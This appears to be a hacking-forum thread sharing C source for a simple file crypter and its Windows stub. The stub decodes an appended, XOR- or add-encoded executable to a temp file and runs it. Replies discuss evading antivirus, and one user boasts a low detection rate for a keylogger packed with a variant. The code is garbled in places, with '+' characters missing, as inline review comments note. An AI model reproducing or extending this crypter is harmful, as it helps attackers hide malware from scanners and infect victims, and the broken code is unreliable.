Programming and Scripting => C - C++ => : ca0s November 26, 2010, 05:39:30 PM
-
I made this when I was bored this summer. It ciphers files by adding or XORing a single user-selected byte to each byte. It includes a stub for working with EXEs.
Crypter:
/*
Ca0s Crypt v1
Crypts files playing with bytes.
Two types:
/- Byte
^ Byte
Includes a 19856-byte stub for working with EXEs. If you compile the stub and its size is different, you have to
change the 'stubSize' variable or set it when calling the program, with argv.
[st4ck-3rr0r.blogspot.com]
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <ctype.h>
void uso();
/* Crypter state kept at file scope; every field is written from main().
 * isExe: "-exe" given; jobMode: 1=crypt, 2=decrypt, 0=not set; cryptMode: 1=add, 2=xor;
 * x: loop index reused by both loops in main(); originalSize: input length as an int;
 * stubSize: bytes of stub.exe to skip on decrypt (overridable with "-stubsize"); error: "-byte" failed to parse. */
int isExe=0, jobMode=0, cryptMode=1, x, originalSize, stubSize=19856, error=0;
/* originalFile: input opened "rb"; newFile: output opened "wb"; stubFile is declared but never used in this file. */
FILE *originalFile, *stubFile, *newFile;
struct stat myStat;
/* Set only when "-byte XX" parses; main() compares it with NULL to decide whether the default key 0x20 applies. */
char *tmpCByte;
/* Lookup table of (ASCII hex digit, nibble value) pairs: digit characters at even indexes, their values at the
 * following odd index. "-byte" parsing scans it linearly with toupper() on the input character. */
char hexConv[32]={'0', 0x00, '1', 0x01, '2', 0x02, '3', 0x03, '4', 0x04, '5', 0x05, '6', 0x06, '7', 0x07, '8', 0x08, '9', 0x09, 'A', 0x0A, 'B', 0x0B, 'C', 0x0C, 'D', 0x0D, 'E', 0x0E, 'F', 0x0F};
/*
 * Entry point: parses the command line, then either encodes ("crypt") or
 * decodes ("decrypt") the input file byte by byte into the output file.
 * The transform is a single-byte add (cryptMode 1) or xor (cryptMode 2)
 * with cByte. With "-exe", crypt first copies a local "stub.exe" into the
 * output followed by a 2-byte header (mode byte, key byte) and then the
 * encoded payload; decrypt skips stubSize+2 bytes of the input instead.
 *
 * NOTE(review): as rendered here the source is not valid C -- every loop
 * step reads "x )" and every compound assignment reads " =", which looks
 * like the '+' characters were dropped by the forum rendering; read those
 * spots as "x++" / "+=" with that caveat. strcmp/strlen/memcpy are also
 * used although <string.h> is not among the includes above.
 *
 * Exit status is 0 on every path, including the error messages below and
 * the usage text printed by uso().
 */
int main(int argc, char *argv[])
{
printf("Ca0s Crypt v1\n\n");
char *fileName, *newFileName; /* never initialized; the NULL test after parsing reads whatever the stack holds */
char *cByte=(char *)malloc(1); /* key byte; replaced by tmpCByte when "-byte" was given */
/* Scans every argv slot, argv[0] included; "argc>(x 1)" guards each one-value lookahead. */
for(x=0; x<argc; x )
{
if(strcmp(argv[x], "-exe")==0) isExe=1;
if((strcmp(argv[x], "-file")==0) && (argc>(x 1))) fileName=argv[x 1];
if((strcmp(argv[x], "-w")==0) && (argc>(x 1))) newFileName=argv[x 1];
if((strcmp(argv[x], "-job")==0) && (argc>(x 1)))
{
if(strcmp(argv[x 1], "crypt")==0) jobMode=1;
else if(strcmp(argv[x 1], "decrypt")==0) jobMode=2;
}
if((strcmp(argv[x], "-crypt")==0) && (argc>(x 1)))
{
if(strcmp(argv[x 1], "1")==0) cryptMode=1; // /- 0x20
if(strcmp(argv[x 1], "2")==0) cryptMode=2; // ^0x20
}
/* "-byte XX": exactly two hex digits, converted by linear search through hexConv; any other length or
 * an unrecognised character sets error and main() falls through to uso() below. */
if((strcmp(argv[x], "-byte")==0) && (argc>(x 1)))
{
if(strlen(argv[x 1])==2)
{
tmpCByte=(char *)malloc(1);
*tmpCByte=0x00;
char *argByte=(char *)malloc(2);
memcpy(argByte, argv[x 1], 2);
char *conversion=(char *)malloc(1);
int y=0, z=0, good=0;
for(y=0; y<=1; y )
{
good=0;
memcpy(conversion, argByte y, 1);
/* Walks all 31 slots, so the nibble values at odd indexes are compared as well as the digit characters. */
for(z=0; z<31; z )
{
if(toupper(*conversion) == hexConv[z])
{
good=1;
/* First digit is the high nibble (value*16), second the low nibble; a leading '0' adds nothing via either branch. */
if((y==0) && (hexConv[z 1]!=0x00)) *tmpCByte =hexConv[z 1]*16;
else *tmpCByte =hexConv[z 1];
break;
}
}
if(good==0)
{
error=1;
break;
}
}
}
else error=1;
}
if((strcmp(argv[x], "-stubsize")==0) && (argc>(x 1))) stubSize=atoi(argv[x 1]); /* atoi: no range check or error report */
}
/* uso() prints the help and exit()s, so nothing below runs without both paths, a job and a valid key. */
if((fileName==NULL) || (newFileName==NULL) ||(jobMode==0) || (error==1)) uso();
printf("Original file: %s\n", fileName);
originalFile=fopen(fileName, "rb");
if(originalFile==NULL)
{
printf("Error: can't open file to crypt.\n");
return 0;
}
fstat(fileno(originalFile), &myStat); /* return value unchecked */
originalSize=myStat.st_size; /* st_size narrowed into an int */
printf("Size: %d bytes.\n", originalSize);
newFile=fopen(newFileName, "wb");
if(newFile==NULL)
{
printf("Error: can't create output file.\n");
return 0;
}
if(jobMode==1) printf("Job: crypt.\n");
else if(jobMode==2) printf("Job: decrypt.\n");
if(cryptMode==1) printf("Mode: /- BYTE\n");
else if(cryptMode==2) printf("Mode: ^ BYTE\n");
if(tmpCByte==NULL)
{
*cByte=0x20; /* default key when "-byte" was not given */
printf("Using default byte (0x20).\n");
}
else
{
cByte=tmpCByte; /* the 1-byte buffer allocated for cByte above is simply dropped here */
printf("Using byte 0x%x.\n", (unsigned char)*cByte);
}
if(isExe==1) printf("Working with a EXE. Using stub.\n");
if((isExe==1) && (jobMode==2))
{
printf("Stub's size: %d bytes.\n", stubSize);
stubSize =2; /* skip the stub plus the 2-byte (mode, key) header that crypt wrote */
}
char *originalBuffer=(char *)malloc(originalSize); /* whole input held in memory; malloc result unchecked */
char *tmpByte1=(char *)malloc(1);
char *tmpByte2=(char *)malloc(1);
fread(originalBuffer, originalSize, 1, originalFile); /* return value unchecked */
/* crypt + exe: output layout is stub.exe bytes, then the mode byte, then the key byte, then the encoded payload.
 * This fixed layout (a known stub followed by a 2-byte header) is what the stub's own main() reads back, and it
 * is also the on-disk structure a file scanner can key on. */
if((isExe==1) && (jobMode==1))
{
char *modeByte=(char *)malloc(1);
switch(cryptMode)
{
case 1:
*modeByte=0x01;
break;
case 2:
*modeByte=0x02;
break;
}
FILE *myStub=fopen("stub.exe", "rb"); /* looked up relative to the current working directory */
if(myStub==NULL)
{
printf("Error: can't open stub.\n");
return 0;
}
while(fread(tmpByte2, 1, 1, myStub)) fwrite(tmpByte2, 1, 1, newFile); /* byte-at-a-time copy of the stub */
fclose(myStub);
fwrite(modeByte, 1, 1, newFile);
fwrite(cByte, 1, 1, newFile);
}
if((isExe==1) && (jobMode==2))
{
originalBuffer =stubSize; /* advance the pointer past stub+header instead of copying; originalSize shrinks to match */
originalSize-=stubSize;
}
/* Per-byte transform. crypt: add or xor the key; decrypt: subtract or xor (xor is its own inverse). */
for(x=0; x<originalSize; x )
{
memcpy(tmpByte1, originalBuffer x, 1);
if(jobMode==1)
{
switch(cryptMode)
{
case 1:
*tmpByte1 =*cByte;
break;
case 2:
*tmpByte1^=*cByte;
break;
}
fwrite(tmpByte1, 1, 1, newFile);
}
else if(jobMode==2)
{
switch(cryptMode)
{
case 1:
*tmpByte1-=*cByte;
break;
case 2:
*tmpByte1^=*cByte;
break;
}
fwrite(tmpByte1, 1, 1, newFile);
}
}
fclose(originalFile);
fclose(newFile);
printf("\nTerminado. Archivo creado en %s\n", newFileName); /* Spanish: "Done. File created at %s" */
return 0;
}
/*
 * Prints the command-line help (mandatory switches, then optional ones) to
 * stdout and terminates the process with status 0. It never returns; main()
 * calls it when a required argument is missing or "-byte" did not parse.
 */
void uso()
{
    static const char *const help_text[] = {
        "Mandatory args:\n\t-file PATH\t\tSets file to crypt\n\t-w PATH\t\t\tSets output file\n\t-job [crypt|decrypt]\tWhat to do\n",
        "Optional args:\n\t-exe\t\t\tInclude stub, for exe's\n\t-byte BYTE (00-FF)\tChanges crypt-byte (default 0x20)\n\t-crypt 1/2\t\tCrypt mode. 1( -BYTE) 2(^BYTE)\n\t-stubsize SIZE\tSets stub size when working with a exe. Default: 19856\n",
    };
    for (size_t i = 0; i < sizeof help_text / sizeof help_text[0]; i++) {
        fputs(help_text[i], stdout);
    }
    exit(0);
}
Stub:
/*
Stub para Ca0s Crypt v1
If you modify the source, change MySize to the new size in bytes
[st4ck-3rr0r.blogspor.com]
*/
#include <sys/stat.h>
#include <windows.h>
#include <stdio.h>
#include <io.h>
#include <process.h>
#define MySize 19856
/* mySelf: the stub's own executable opened "rb"; tmpFile: the decoded payload being written out. */
FILE *mySelf, *tmpFile;
struct stat myStat;
/* myName: own path from GetModuleFileName(); tmpName: the tmpnam() path the payload is dropped to. */
char myName[MAX_PATH], tmpName[MAX_PATH];
/* embedSize: bytes appended after the first MySize bytes of the image; x: loop index. */
int embedSize, x;
/* One-byte heap buffers: current payload byte, mode byte (0x01 add, 0x02 xor), key byte. */
char *myByte, *modeByte, *cByte;
/*
 * Stub entry point. Locates its own executable, treats everything past the
 * first MySize bytes of that file as (mode byte, key byte, encoded payload),
 * decodes the payload into a fresh tmpnam() file on disk and execve()s it.
 * This is why the thread calls the scheme "scantime": the decoded program
 * exists as an ordinary file before it runs, so it is visible to anything
 * watching the filesystem, and the temp file is never removed afterwards.
 *
 * NOTE(review): the loop step reads "x )" here as well -- presumably "x++"
 * lost to the forum rendering, as in the crypter. No call below checks its
 * return value.
 */
int main()
{
GetModuleFileName(NULL, myName, sizeof(myName)); /* full path of the running stub (Win32) */
stat(myName, &myStat);
embedSize=myStat.st_size-MySize; /* bytes appended after the compiled stub; wrong if MySize is stale */
mySelf=fopen(myName, "rb"); /* unchecked; fileno(NULL) below is undefined if this fails */
lseek(fileno(mySelf), MySize, SEEK_SET); /* seeks the descriptor, not the FILE; relies on nothing having been read through mySelf yet */
tmpnam(tmpName); /* predictable name, not created atomically; the decoded payload lands here */
tmpFile=fopen(tmpName, "wb");
myByte=(char *)malloc(1);
modeByte=(char *)malloc(1);
cByte=(char *)malloc(1);
fread(modeByte, 1, 1, mySelf); /// Crypt mode
fread(cByte, 1, 1, mySelf); // Crypt byte
/* embedSize still counts the two header bytes just consumed, so the last two iterations appear to
 * read at EOF and rewrite the previous byte (fread unchecked) -- TODO confirm against the original. */
for(x=0; x<embedSize; x )
{
fread(myByte, 1, 1, mySelf);
if(*modeByte==0x01)
*myByte-=*cByte; /* inverse of the crypter's add */
if(*modeByte==0x02)
*myByte^=*cByte; /* xor is its own inverse */
fwrite(myByte, 1, 1, tmpFile);
}
fclose(mySelf);
fclose(tmpFile);
char *execPath[2];
execPath[0]=tmpName;
execPath[1]=NULL;
execve(execPath[0], execPath, NULL); /* replaces this process with the temp file, empty environment; on failure falls through to return 0 */
return 0;
}
Mandatory args:
-file PATH -> Sets file to crypt
-w PATH -> Sets output file
-job [crypt|decrypt] -> What to do
Optional args:
-exe -> Include stub, for exe's
-byte BYTE (00-FF) -> Changes crypt-byte (default 0x20)
-crypt 1/2 -> Crypt mode. 1( -BYTE) 2(^BYTE)
-stubsize SIZE -> Sets stub size when working with a exe. Default: 19856
-
Great for people looking for open source crypter.
Thanks for sharing.
-
Note: Its a scantime crypter, not runtime. But still a good example :)
-
Note: Its a scantime crypter, not runtime. But still a good example :)
What you mean by "scantime" & "runtime"?
-
What you mean by "scantime" & "runtime"?
A scantime crypter will only "protect/crypt" your file when the file is not running. Once you run it, most AV's will detect the temporarily created file. A runtime crypter will make the file undetectable at all times.
-
A scantime crypter will only "protect/crypt" your file when the file is not running. Once you run it, most AV's will detect the temporarily created file. A runtime crypter will make the file undetectable at all times.
It's not that hard to modify to make it a runtime crypter.
-
This is awesome bro. I will for sure use this as an example :)
-
I hate looking at my own code from some years ago, I almost always find it awful. But thanks :P
-
This is awesome bro. I will for sure use this as an example :)
What are you working on. I was planning to create something like this for my encoder/decoder.
-
I doubt that OP will ever read it, but still: THANKS for sharing this! I learned quite a bit about the stub crypting concept
Here's ca0s crypt v2.0, written by me: https://evilzone.org/programming-newbies/%28c-source%29-cli-stub-crypter-%28noobfriendly%29/msg106155/#msg106155
I hope you don't feel copy&pasted or anything :P and that it was okay to re-use your name
Cheers buddy
-
A scantime crypter will only "protect/crypt" your file when the file is not running. Once you run it, most AV's will detect the temporarily created file. A runtime crypter will make the file undetectable at all times.
Actually "runtime crypted" files are still detectable in memory.
These terms are misnomers imo. They should call it temp file execution vs in-memory execution or something similar, but not "scantime/runtime protected".
-
I doubt that OP will ever read it, but still: THANKS for sharing this! I learned quite a bit about the stub crypting concept
no
Well, I'm glad you actually found that piece of crap that was my "crypter" useful . It was just a damn simple and naive example implementation.
I hope you don't feel copy&pasted or anything :P and that it was okay to re-use your name
Cheers buddy
Nah, no problem.
For the next version, if you are going to continue developing it, you could try to avoid writing the original file into disk and just use the same process as the stub, for example.
-
yo mate! congratz for still being alive
It was just a damn simple and naive example implementation.
And that's why it perfectly fitted my needs :D i.e. abilities. Many other stub sources I've found were either .net crap or just way above my comprehension skill. (But since you helped me understanding general stub concepts, they're not so hard to analyze anymore. Thus I've already got sum new projects in the pipeline ;) )
Nah, no problem.
<3
For the next version, if you are going to continue developing it, you could try to avoid writing the original file into disk and just use the same process as the stub, for example.
Already done (something similar), haha, but thanks for the hint. The code I've posted is actually just the educational version, addressing interested newbes whose brain is as slow as mine xP
However, after a few minor improvements, this script can do surprisingly well! Just got a 1/33 on nodistribute with some generic keylogger, hihi
Anyway, thanks again :3 keep it up bro
-
Already done (something similar), haha, but thanks for the hint. The code I've posted is actually just the educational version, addressing interested newbes whose brain is as slow as mine xP
However, after a few minor improvements, this script can do surprisingly well! Just got a 1/33 on nodistribute with some generic keylogger, hihi
Anyway, thanks again :3 keep it up bro
For all the work put into AV systems there is a lot of stupid simple ways to defeat just a generic static-scan, the harder stuff is defeating properly implemented (both software and user wise) live monitoring (why is this program opening a socket, is this allowed, etc)
-
For all the work put into AV systems there is a lot of stupid simple ways to defeat just a generic static-scan, the harder stuff is defeating properly implemented (both software and user wise) live monitoring (why is this program opening a socket, is this allowed, etc)
Ye, still shocked that some basic knowledge is all one needs to bypass em. I don't want to imagine what some of the more experienced people could achieve... this shit kicked my paranoia up to a whole new level >.<
-
Ye, still shocked that some basic knowledge is all one needs to bypass em. I don't want to imagine what some of the more experienced people could achieve... this shit kicked my paranoia up to a whole new level >.<
That's the problem with signature based scanning ( simple file scanning for example ): all one needs to do is write their own code and payload, if even that ( sometimes it is as simple as stripping all the comments out of the code ). Heuristic scanning takes it a step further and looks for behavior in a virtual machine (some decompile and examine the code), but it can't block every attempt to, say, hook your keyboard driver, as legitimate applications do this as well. Correct me if I'm wrong, but I believe I've explained it properly :)
The scary shit happens in Ring 0 ;)
-
That's the problem with signature based scanning ( simple file scanning for example ) all one needs to do is write their own code and payload, if that even ( sometimes as simple as stripping all the comment out of the code )
No one complains that a fork is not really good for eating soup.
Signatures are just one part of the arsenal and should be treated as that. They are not problematic, they are just not suitable for everything.
Heuristic scanning takes it a step further and looks for behavior in a virtual machine
Heuristics and the way of how you obtain information are completely separate. You may use behavioural information, but you may also use anything else, like the structure of the file, the code, etc. Heuristics just describes how you use the information (see also this article (https://en.wikipedia.org/wiki/Heuristic_%28computer_science%29)).
What you mean is emulation in a sandbox, which can be and often is combined with heuristics.
(some decompile and examine the code)
Decompilation is done for humans only, computers don't need it. It does not add any information for automatic code examination. So, no, I don't believe that.
-
Decompilation is done for humans only, computers don't need it. It does not add any information for automatic code examination. So, no, I don't believe that.
Well, at least some analysis techniques used for decompilation are useful in other contexts, too. For example, a call graph or control-flow graph might be more useful than raw assembly code. So maybe B1N4RY2.0 meant "obtaining more high-level and thus abstract information" when (s)he said "decompiling".
Anyway, your post was very concise and informative. +1
-
No one complains that a fork is not really good for eating soup.
Signatures are just one part of the arsenal and should be treated as that. They are not problematic, they are just not suitable for everything.
Never said they in themselves are problematic. Just that they can easily be bypassed, which is a problem specific to the task they perform. Nothing more :)
Heuristics and the way of how you obtain information are completely separate. You may use behavioural information, but you may also use anything else, like the structure of the file, the code, etc. Heuristics just describes how you use the information (see also this article (https://en.wikipedia.org/wiki/Heuristic_%28computer_science%29)).
What you mean is emulation in a sandbox, which can be and often is combined with heuristics.
I should have expanded upon this with a simple "etc" after behavioral scanning, didn't mean to imply heuristics was interchangeable.
Decompilation is done for humans only, computers don't need it. It does not add any information for automatic code examination. So, no, I don't believe that.
As for this one, I was under the impression some try to decompile the code for further analysis, maybe not?
-
As for this one, I was under the impression some try to decompile the code for further analysis, maybe not?
Well, like I said. The code does not contain more information if you decompile it. It is just a better structure for a human to read. Malware analysts will of course decompile code, but I don't see any use for an antivirus product in doing that. It will unpack and analyse code, but the code does not need to be in that human friendly form to do so.
-
Well, like I said. The code does not contain more information if you decompile it. It is just a better structure for a human to read. Malware analysts will of course decompile code, but I don't see any use for an antivirus product in doing that. It will unpack and analyse code, but the code does not need to be in that human friendly form to do so.
Ah ya gotcha, never really thought about why it would decompile it ( talking the AV itself, not for like you said "human" readability ) So I'm sure I either misread or mistook what I read something lol :D